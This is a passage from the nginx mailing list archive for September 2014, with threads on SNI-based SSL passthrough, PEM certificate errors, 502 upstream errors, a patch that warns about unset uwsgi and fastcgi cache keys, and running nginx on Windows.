HTTPS. > > Our current configuration is slow (not painfully, just slower than we'd > like), and we figured having NGINX do some of the work would speed things > up. > > Can NGINX pass through some HTTPS requests (by domain) without modifying > anything (by checking SNI in the initial packet)? Most (all?) websites > indicate that I should decode and encode the traffic (which is not be > possible because of cases such as https://google.com/). > > So ultimately, what would be ideal for us is: > 1. NGINX sits on network boundary, listening for SSL/TLS connections > 2. When a new connection comes in, NGINX decides to pass on the TLS > connection without touching it OR serve it as a regular HTTPS website (OR > depends on domain) > > Lastly, is there any current way to achieve X-FORWARDED-FOR with HTTPS? I > understand it can't go into the actual HTTPS request, but figured it could > be sent BEFORE the HTTPS decode packet. (the receiving end would have to > understand this also) For all those things, haproxy is way more adequate. Regards, Lukas From nginx-forum at nginx.us Fri Sep 5 09:43:02 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 05:43:02 -0400 Subject: NGINX SSL passthrough without certificate In-Reply-To: References: Message-ID: <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> Hi Lukas, While HAProxy is able to do some of those things (not sure about X-FORWARDED-FOR workarounds?), I'd still prefer to use NGINX where possible (for other reasons, such as PageSpeed support, etc) Is NGINX able to do any of the things mentioned in the question? Specifically, can it sort by SNI hostname without becoming an SSL endpoint? If not, is there a reason why? (has it been decided by the community that it's not a good idea, or it just hasn't been developed?) I've seen a few similar questions around, but no definitive answer. Thanks, OzJD Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253090#msg-253090 From luky-37 at hotmail.com Fri Sep 5 10:22:17 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 5 Sep 2014 12:22:17 +0200 Subject: NGINX SSL passthrough without certificate In-Reply-To: <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> References: , <9b6cd1679fbd01048ad5aa077bc03ed0.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > Hi Lukas, > > While HAProxy is able to do some of those things (not sure about > X-FORWARDED-FOR workarounds?) Yes, haproxy supports and pushes the PROXY protocol for this exact reason. > I'd still prefer to use NGINX where possible > (for other reasons, such as PageSpeed support, etc) Well, you can't use PageSpeed if you forward SSL encrypted TCP traffic, can you? Perhaps you need a combination between the two? For example, SNI based routing on a first (HAProxy) layer, passing the SSL encrypted traffic either to nginx, for decryption/pagepspeed, etc or directly to a backend (based on SNI). > Is NGINX able to do any of the things mentioned in the question? I don't think so, mainly because nginx' focus is http/https, not TCP forwarding. Regards, Lukas From nginx-forum at nginx.us Fri Sep 5 11:54:05 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 07:54:05 -0400 Subject: NGINX SSL passthrough without certificate In-Reply-To: References: Message-ID: Lukas, I think you're right. The combination of three may be optimal at this time. I'll see what I come up with - I hadn't heard of the PROXY protocol before (was thinking of something similar though). That's made my life plenty easier! Thanks mate :-) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253095#msg-253095 From nginx-forum at nginx.us Fri Sep 5 14:11:02 2014 From: nginx-forum at nginx.us (vk1dadhich) Date: Fri, 05 Sep 2014 10:11:02 -0400 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: Hi Team, I am facing a issue regarding the ssl in nginx , find below the error logs : 2014/09/05 19:23:36 [emerg] 18774#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:23:36 [emerg] 18775#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:26:51 [emerg] 18977#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) 2014/09/05 19:26:51 [emerg] 18978#0: SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL routines:SSL_CTX_use_PrivateKey_file:PEM lib) had donethe google but can't resolve, only you guies can help me, its very urgent. Thank & Regards Vijay kr vk1dadhich at gmail.com Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253098#msg-253098 From nginx-forum at nginx.us Fri Sep 5 14:13:49 2014 From: nginx-forum at nginx.us (vk1dadhich) Date: Fri, 05 Sep 2014 10:13:49 -0400 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: One most imporatant thing, we site working with https from 2 months but after configuer the sftp with openssl , it created the problem. i did the old settings of sshd_config, as it is as its worked, but still facing the issue. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253099#msg-253099 From miguelmclara at gmail.com Fri Sep 5 14:14:47 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Fri, 5 Sep 2014 15:14:47 +0100 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: Seems like "/etc/nginx/ssl/server.crt" content is not correct ("no start line error), maybe a bad copy paste? Melhores Cumprimentos // Best Regards ----------------------------------------------- *Miguel Clara* *IT - Sys Admin & Developer* *E-mail: *miguelmclara at gmail.com www.linkedin.com/in/miguelmclara/ On Fri, Sep 5, 2014 at 3:11 PM, vk1dadhich wrote: > Hi Team, > > I am facing a issue regarding the ssl in nginx , find below the error logs > : > > > 2014/09/05 19:23:36 [emerg] 18774#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:23:36 [emerg] 18775#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18977#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18978#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > > had donethe google but can't resolve, only you guies can help me, its very > urgent. > > Thank & Regards > Vijay kr > vk1dadhich at gmail.com > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253088,253098#msg-253098 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: linkedin.png Type: image/png Size: 655 bytes Desc: not available URL: From nginx-forum at nginx.us Fri Sep 5 21:49:08 2014 From: nginx-forum at nginx.us (useopenid) Date: Fri, 05 Sep 2014 17:49:08 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> Message-ID: <813b313b58edd13fb4d5bfd3e8ec93b3.NginxMailingListEnglish@forum.nginx.org> Thanks! I setup stunnel in the interim, but this will be more efficient. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253106#msg-253106 From steve at greengecko.co.nz Sun Sep 7 00:52:43 2014 From: steve at greengecko.co.nz (Steve Holdoway) Date: Sun, 07 Sep 2014 12:52:43 +1200 Subject: urgent need help ,ssl error ; In-Reply-To: References: Message-ID: <1410051163.3094.20.camel@steve-new> "no start line error" is pretty specific. The first line with any text on should read -----BEGIN CERTIFICATE----- with 5 dashes before and after the text. On Fri, 2014-09-05 at 10:11 -0400, vk1dadhich wrote: > Hi Team, > > I am facing a issue regarding the ssl in nginx , find below the error logs > : > > > 2014/09/05 19:23:36 [emerg] 18774#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:23:36 [emerg] 18775#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18977#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > 2014/09/05 19:26:51 [emerg] 18978#0: > SSL_CTX_use_PrivateKey_file("/etc/nginx/ssl/server.crt") failed (SSL: > error:0906D06C:PEM routines:PEM_read_bio:no start line error:140B0009:SSL > routines:SSL_CTX_use_PrivateKey_file:PEM lib) > > had donethe google but can't resolve, only you guies can help me, its very > urgent. > > Thank & Regards > Vijay kr > vk1dadhich at gmail.com > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253098#msg-253098 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From nginx-forum at nginx.us Sun Sep 7 20:49:31 2014 From: nginx-forum at nginx.us (erankor2) Date: Sun, 07 Sep 2014 16:49:31 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140905043515.GA1634@mdounin.ru> References: <20140905043515.GA1634@mdounin.ru> Message-ID: <9a5c4332f0c890f020feaf9d53820fb2.NginxMailingListEnglish@forum.nginx.org> Thank you very much, Maxim. I implemented the solution as you advised. Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253116#msg-253116 From nginx-forum at nginx.us Sun Sep 7 23:15:46 2014 From: nginx-forum at nginx.us (nfn) Date: Sun, 07 Sep 2014 19:15:46 -0400 Subject: 502 errors with nginx and php5-fpm Message-ID: Hi, I'm getting lots of 502 errors but my nginx logs and php logs don't give me information that can help me identify the problem. I only have the 502 errors in the access logs. I don't see any errors in the error.log or php logs. Fist, how can I configure nginx and php so I can get more information about the problem? I already increase fastcgi buffers and php memory limit without success. Some help would be appreciated. Thanks Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253117,253117#msg-253117 From mdounin at mdounin.ru Mon Sep 8 11:50:58 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 8 Sep 2014 15:50:58 +0400 Subject: 502 errors with nginx and php5-fpm In-Reply-To: References: Message-ID: <20140908115057.GA59236@mdounin.ru> Hello! On Sun, Sep 07, 2014 at 07:15:46PM -0400, nfn wrote: > Hi, > > I'm getting lots of 502 errors but my nginx logs and php logs don't give me > information that can help me identify the problem. > > I only have the 502 errors in the access logs. I don't see any errors in the > error.log or php logs. > > Fist, how can I configure nginx and php so I can get more information about > the problem? If the 502 error is returned by nginx, the reason should be logged to error log, at the "error" level or higher. If you don't see anything in your error log, this may mean one of the following: - The error was returned by the backend. (Highly unlikely in case of php-fpm, AFAIK.) - You are looking into the wrong log, or your error log is configured to only log errors with higher levels. See http://nginx.org/r/error_log for details on configuring error logging. It is also possible to configure nginx to write debugging logs, with all low-level information about request processing, see here: http://nginx.org/en/docs/debugging_log.html (This still uses error_log though.) -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Mon Sep 8 21:01:07 2014 From: nginx-forum at nginx.us (xkillac4) Date: Mon, 08 Sep 2014 17:01:07 -0400 Subject: 502 errors with nginx+gunicorn Message-ID: Hi all, I am sending large post request to gunicorn/django behind nginx. If gunicorn responds and closes the connection before nginx has finished sending the large request body, it causes nginx to issue a 502 Bad Gateway response instead of the app server's response. This scenario happens e.g., if the endpoint requires authentication but the request is not authenticated (401 or 403). More info here: https://github.com/benoitc/gunicorn/issues/872 As noted in the linked gunicorn issue, I've worked around this by making sure django waits for the entire request to come in before responding. Not sure if this is something you guys are interested in looking into, but thought I'd share. Thanks, Colin Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253135,253135#msg-253135 From mdounin at mdounin.ru Tue Sep 9 02:55:17 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 9 Sep 2014 06:55:17 +0400 Subject: 502 errors with nginx+gunicorn In-Reply-To: References: Message-ID: <20140909025517.GN59236@mdounin.ru> Hello! On Mon, Sep 08, 2014 at 05:01:07PM -0400, xkillac4 wrote: > Hi all, > > I am sending large post request to gunicorn/django behind nginx. If > gunicorn responds and closes the connection before nginx has finished > sending the large request body, it causes nginx to issue a 502 Bad Gateway > response instead of the app server's response. This scenario happens e.g., > if the endpoint requires authentication but the request is not authenticated > (401 or 403). > > More info here: https://github.com/benoitc/gunicorn/issues/872 > > As noted in the linked gunicorn issue, I've worked around this by making > sure django waits for the entire request to come in before responding. Not > sure if this is something you guys are interested in looking into, but > thought I'd share. This looks like classic problem, solved with lingering close in http world (see [1] for nginx own implementation details). There isn't much nginx can do in this case - it's something to be resolved in a backend software. [1] http://nginx.org/r/lingering_close -- Maxim Dounin http://nginx.org/ From lists at ruby-forum.com Tue Sep 9 17:51:43 2014 From: lists at ruby-forum.com (Ugur Engin) Date: Tue, 09 Sep 2014 19:51:43 +0200 Subject: video metadata parameters Message-ID: <8de8f8fe42289ad2db7090805a1ca8e1@ruby-forum.com> Hi, Is that possible to take metadata information from the mp4 file without using the third party player while streaming a video file? Because i need to the metadata parameters that can be use them in our code structure while a video is playing after the first request. Thank you. -- Posted via http://www.ruby-forum.com/. From nginx-forum at nginx.us Tue Sep 9 18:25:15 2014 From: nginx-forum at nginx.us (gthb) Date: Tue, 09 Sep 2014 14:25:15 -0400 Subject: Change blank uwsgi_cache_key default, or log warning Message-ID: Hello, Because uwsgi_cache_key has no default value (or rather, has the empty string as its default value), a configuration with uwsgi_cache set but uwsgi_cache_key not set behaves in a way that is very unlikely to be desired: Nginx caches the first publicly cacheable response it gets from upstream (for any request), and serves that cached response to *any* request mapping to the same location. The internals of that can be seen in the debug log, where the cache key is empty for all requests: 2014/09/09 17:41:02 [debug] 91211#0: *13 http cache key: "" This is in contrast to a configuration with proxy_cache enabled but proxy_cache_key not set; that behaves OK because proxy_cache_key has a useful default. Because of the *general* correspondence between the http_proxy and http_uwsgi modules, it's easy to fall into this trap, defining uwsgi_cache but not uwsgi_cache_key. When that happens, and unexpected responses start coming back, the first place one looks is error.log, and there's nothing there. To get rid of this gotcha, I suggest either: 1. log a warning whenever a location/server/http block has uwsgi_cache set but no uwsgi_cache_key set. or 2. change the default value of uwsgi_cache_key to a more useful default, such as $scheme$host$request_uri, similar to proxy_cache_key (not quite the same, because the proxy_cache_key has $proxy_host in its default, and there is no corresponding $uwsgi_host). You might not want to make such a default-behavior change in a subminor release --- but as a counterargument, the current default seems quite unlikely to be relied on by anyone. Cheers, Gulli Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253149,253149#msg-253149 From jon.clayton at rackspace.com Wed Sep 10 03:15:20 2014 From: jon.clayton at rackspace.com (Jon Clayton) Date: Tue, 9 Sep 2014 22:15:20 -0500 Subject: Socket connection failures on 1.6.1~precise In-Reply-To: <540629F7.6050004@rackspace.com> References: <5405E98A.2070105@rackspace.com> <20140902191448.GP1849@mdounin.ru> <540629F7.6050004@rackspace.com> Message-ID: <540FC248.1070805@rackspace.com> Just closing the loop on this, but what appeared to be happening was that newly created nodes were not having the nginx master PID start up with a custom ulimit set in /etc/security/limits.d/. The workers were all fine since the worker_rlimit_nofile was set in the nginx.conf, but I was running into a separate issue that was preventing nginx from inheriting the custom ulimit setting for that master PID file. Truth be told, I never quite nailed down an exact RCA other than ensuring the nginx master PID came up with the custom ulimit setting. That would seem to indicate something was causing a spike in the number of open files for the master PID, but I can look into that separately. On 09/02/2014 03:35 PM, Jon Clayton wrote: > I did see the changelog hadn't noted many changes and running a diff > of the versions shows what you mentioned regarding the 400 bad request > handling code. I'm not necessarily stating that nginx is the problem, > but it would seem like something had changed enough to cause the > backend's backlog to fill more rapidly. > > That could be a completely bogus statement as I've been attempting to > find a way to track down exactly what backlog is being filled, but my > test of downgrading nginx back to 1.6.0 from the nginx ppa seemed to > also point at a change in nginx causing the issue since the errors did > not persist after downgrading. > > It's very possible that I'm barking up the wrong tree, but the fact > that only changing nginx versions back down to 1.6.0 from 1.6.1 > eliminated the errors seems suspicious. I'll keep digging, but I'm > open to any other suggestions. > > > On 09/02/2014 02:14 PM, Maxim Dounin wrote: >> Hello! >> >> On Tue, Sep 02, 2014 at 11:00:10AM -0500, Jon Clayton wrote: >> >>> I'm trying to track down an issue that is being presented only when >>> I run >>> nginx version 1.6.1-1~precise. My nodes running 1.6.0-1~precise do not >>> display this issue, but freshly created servers are getting floods >>> of these >>> socket connection issues a couple times a day. >>> >>> /connect() to unix:/tmp/unicorn.sock failed (11: Resource temporarily >>> unavailable) while connecting to upstream/ >>> >>> The setup I'm working with is nginx proxying requests to a unicorn >>> socket >>> powered by a ruby app. As stated above, the error is NOT present on >>> nodes >>> running 1.6.0-1~precise, but any newly created node gets the newer >>> 1.6.1-1~precise package installed and will inevitably have that error. >>> >>> All settings from nodes running 1.6.0 appear to be the same as newly >>> created >>> nodes on 1.6.1 in terms of sysctl settings, nginx settings, and unicorn >>> settings. All package versions are the same except for nginx. When I >>> downgraded one of the newly created nodes to nginx 1.6.0 using the >>> nginx ppa >>> (ref: >>> https://launchpad.net/~nginx/+archive/ubuntu/stable), the error was not >>> present. >>> >>> Is there any advice, direction, or similar issue experienced that >>> someone >>> else might be able to help me track this down? >> Just some information: >> >> - In nginx itself, the difference between 1.6.0 and 1.6.1 is fairy >> minimal. The only change affecting http is one code line added >> in the 400 Bad Request handling code >> (see http://hg.nginx.org/nginx/rev/b8188afb3bbb). >> >> - The message suggests that backend's backlog is full. This can >> easily happen on load spikes and/or if a backend is overloaded, >> and usually unrelated to the nginx itself. >> > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Wed Sep 10 14:21:18 2014 From: nginx-forum at nginx.us (nanochelandro) Date: Wed, 10 Sep 2014 10:21:18 -0400 Subject: =?UTF-8?Q?fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improvement_sug?= =?UTF-8?Q?gestion?= Message-ID: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> Hello All, fastcgi_cache_use_stale is awesome, especially with "updating" parameter. But I have a feeling that it lacks a complementary parameter (or a separate setting to tune "updating" behaviour) that would instruct nginx to quickly return stale cached response also on first request (while fastcgi app is busy doing it's hard work). Currently existing behaviour is to return stale cached responses on consequent requests only, but first response is delayed until fastcgi finishes it's job. What do you think? Thank you. My deepest regards. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253160,253160#msg-253160 From nginx-forum at nginx.us Wed Sep 10 14:22:24 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Wed, 10 Sep 2014 10:22:24 -0400 Subject: Windows 2008 - logging off kills nignx Message-ID: Nginx serves pages until I log off the web server. I need to log in again and start nginx (sometimes needing to kill IIS). Thanks for any thoughts, Ron Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253161#msg-253161 From nginx-forum at nginx.us Wed Sep 10 14:30:55 2014 From: nginx-forum at nginx.us (biazus) Date: Wed, 10 Sep 2014 10:30:55 -0400 Subject: wrong data in $upstream_status and $upstream_response_time Message-ID: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> Hey Guys, We have been using the latest stable Nginx version 1.6.1, and I've could notice that we might be facing a bug that was supposed to be fixed in version 1.5.11. Bugfix: the $upstream_status variable might contain wrong data if the "proxy_cache_use_stale" or "proxy_cache_revalidate" directives were used. On MISS requests the variables "$upstream_status" and "$upstream_response_time" are eventually returning wrong data, like the example bellow: $upstream_status - ?504, 504, 200" or even ?-, 200" $upstream_response_time - ?8.005, 0.242" As you can see, the data contain two or three values separated by a comma, and also the $upstream_response_time contain two time values, both separated by comma. Is that make sense to you guys ? Is it expected ? Thanks in advance, Daniel Biazus Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253162,253162#msg-253162 From miguelmclara at gmail.com Wed Sep 10 15:22:30 2014 From: miguelmclara at gmail.com (Miguel Clara) Date: Wed, 10 Sep 2014 16:22:30 +0100 Subject: Windows 2008 - logging off kills nignx In-Reply-To: References: Message-ID: How are you staring nginx? On September 10, 2014 3:22:24 PM GMT+01:00, ronlemonz wrote: >Nginx serves pages until I log off the web server. I need to log in >again >and start nginx (sometimes needing to kill IIS). >Thanks for any thoughts, >Ron > >Posted at Nginx Forum: >http://forum.nginx.org/read.php?2,253161,253161#msg-253161 > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 10 16:16:34 2014 From: nginx-forum at nginx.us (ronlemonz) Date: Wed, 10 Sep 2014 12:16:34 -0400 Subject: Windows 2008 - logging off kills nignx In-Reply-To: References: Message-ID: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> I log into the box as myself and then run a bat file which includes: c:\nginx\RunHiddenConsole.exe C:\nginx\nginx.exe ECHO Start php-cgi... c:\nginx\RunHiddenConsole.exe C:\nginx\php-cgi-start.bat Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253161,253164#msg-253164 From mdounin at mdounin.ru Wed Sep 10 17:01:30 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:01:30 +0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> References: <491f264a4756c72b0a2e869382026eb8.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140910170130.GR59236@mdounin.ru> Hello! On Wed, Sep 10, 2014 at 10:21:18AM -0400, nanochelandro wrote: > Hello All, > > fastcgi_cache_use_stale is awesome, especially with "updating" parameter. > But I have a feeling that it lacks a complementary parameter (or a separate > setting to tune "updating" behaviour) that would instruct nginx to quickly > return stale cached response also on first request (while fastcgi app is > busy doing it's hard work). Currently existing behaviour is to return stale > cached responses on consequent requests only, but first response is delayed > until fastcgi finishes it's job. > > What do you think? As of now, nginx needs a client request to be able to request a resource from a backend and to save it to the cache. That is, this behaviour is an implementation detail which isn't trivial to change. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Sep 10 17:03:45 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:03:45 +0400 Subject: wrong data in $upstream_status and $upstream_response_time In-Reply-To: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> References: <87718f4b7803dc7c87846f6f93bb3eb7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140910170345.GS59236@mdounin.ru> Hello! On Wed, Sep 10, 2014 at 10:30:55AM -0400, biazus wrote: > Hey Guys, > > We have been using the latest stable Nginx version 1.6.1, and I've could > notice that we might be facing a bug that was supposed to be fixed in > version 1.5.11. > > Bugfix: the $upstream_status variable might contain wrong data if the > "proxy_cache_use_stale" or "proxy_cache_revalidate" directives were used. > > On MISS requests the variables "$upstream_status" and > "$upstream_response_time" are eventually returning wrong data, like the > example bellow: > > $upstream_status - ?504, 504, 200" or even ?-, 200" > > $upstream_response_time - ?8.005, 0.242" > > As you can see, the data contain two or three values separated by a comma, > and also the $upstream_response_time contain two time values, both separated > by comma. > > Is that make sense to you guys ? Is it expected ? Yes, see http://nginx.org/r/$upstream_addr. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Wed Sep 10 17:49:00 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 10 Sep 2014 21:49:00 +0400 Subject: Change blank uwsgi_cache_key default, or log warning In-Reply-To: References: Message-ID: <20140910174859.GU59236@mdounin.ru> Hello! On Tue, Sep 09, 2014 at 02:25:15PM -0400, gthb wrote: > Hello, > > Because uwsgi_cache_key has no default value (or rather, has the empty > string as its default value), a configuration with uwsgi_cache set but > uwsgi_cache_key not set behaves in a way that is very unlikely to be > desired: Nginx caches the first publicly cacheable response it gets from > upstream (for any request), and serves that cached response to *any* request > mapping to the same location. The internals of that can be seen in the debug > log, where the cache key is empty for all requests: > > 2014/09/09 17:41:02 [debug] 91211#0: *13 http cache key: "" > > This is in contrast to a configuration with proxy_cache enabled but > proxy_cache_key not set; that behaves OK because proxy_cache_key has a > useful default. > > Because of the *general* correspondence between the http_proxy and > http_uwsgi modules, it's easy to fall into this trap, defining uwsgi_cache > but not uwsgi_cache_key. When that happens, and unexpected responses start > coming back, the first place one looks is error.log, and there's nothing > there. > > To get rid of this gotcha, I suggest either: > > 1. log a warning whenever a location/server/http block has uwsgi_cache set > but no uwsgi_cache_key set. Yes, this is mostly trivial and certainly makes sense. Patch below. # HG changeset patch # User Maxim Dounin # Date 1410371072 -14400 # Wed Sep 10 21:44:32 2014 +0400 # Node ID bc4ee0b7cf2643fdcea310638302b9cadc7ac939 # Parent aaa82dc56c9460db1b4233fc1d4559fdd07ff7ed Added warning about unset cache keys. In fastcgi, scgi and uwsgi modules there are no default cache keys, and using a cache without a cache key set is likely meaningless. diff --git a/src/http/modules/ngx_http_fastcgi_module.c b/src/http/modules/ngx_http_fastcgi_module.c --- a/src/http/modules/ngx_http_fastcgi_module.c +++ b/src/http/modules/ngx_http_fastcgi_module.c @@ -2582,6 +2582,11 @@ ngx_http_fastcgi_merge_loc_conf(ngx_conf conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"fastcgi_cache_key\" for \"fastcgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); diff --git a/src/http/modules/ngx_http_scgi_module.c b/src/http/modules/ngx_http_scgi_module.c --- a/src/http/modules/ngx_http_scgi_module.c +++ b/src/http/modules/ngx_http_scgi_module.c @@ -1337,6 +1337,11 @@ ngx_http_scgi_merge_loc_conf(ngx_conf_t conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"scgi_cache_key\" for \"scgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); diff --git a/src/http/modules/ngx_http_uwsgi_module.c b/src/http/modules/ngx_http_uwsgi_module.c --- a/src/http/modules/ngx_http_uwsgi_module.c +++ b/src/http/modules/ngx_http_uwsgi_module.c @@ -1524,6 +1524,11 @@ ngx_http_uwsgi_merge_loc_conf(ngx_conf_t conf->cache_key = prev->cache_key; } + if (conf->upstream.cache && conf->cache_key.value.data == NULL) { + ngx_conf_log_error(NGX_LOG_WARN, cf, 0, + "no \"uwsgi_cache_key\" for \"uwsgi_cache\""); + } + ngx_conf_merge_value(conf->upstream.cache_lock, prev->upstream.cache_lock, 0); -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Wed Sep 10 18:26:10 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Wed, 10 Sep 2014 20:26:10 +0200 Subject: Windows 2008 - logging off kills nignx In-Reply-To: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> References: <72bf9bbe8299a063ecd9c8e48e7981cf.NginxMailingListEnglish@forum.nginx.org> Message-ID: You start a process in userland then kill that userland. No surprises there... Consider running nginx as a service/unconnected to your user session. --- *B. R.* On Wed, Sep 10, 2014 at 6:16 PM, ronlemonz wrote: > I log into the box as myself and then run a bat file which includes: > c:\nginx\RunHiddenConsole.exe C:\nginx\nginx.exe > ECHO Start php-cgi... > c:\nginx\RunHiddenConsole.exe C:\nginx\php-cgi-start.bat > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253161,253164#msg-253164 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 10 19:27:10 2014 From: nginx-forum at nginx.us (nanochelandro) Date: Wed, 10 Sep 2014 15:27:10 -0400 Subject: =?UTF-8?Q?Re=3A_fastcgi_cache_use_stale_=22updating=22_=E2=80=94_improveme?= =?UTF-8?Q?nt_suggestion?= In-Reply-To: <20140910170130.GR59236@mdounin.ru> References: <20140910170130.GR59236@mdounin.ru> Message-ID: 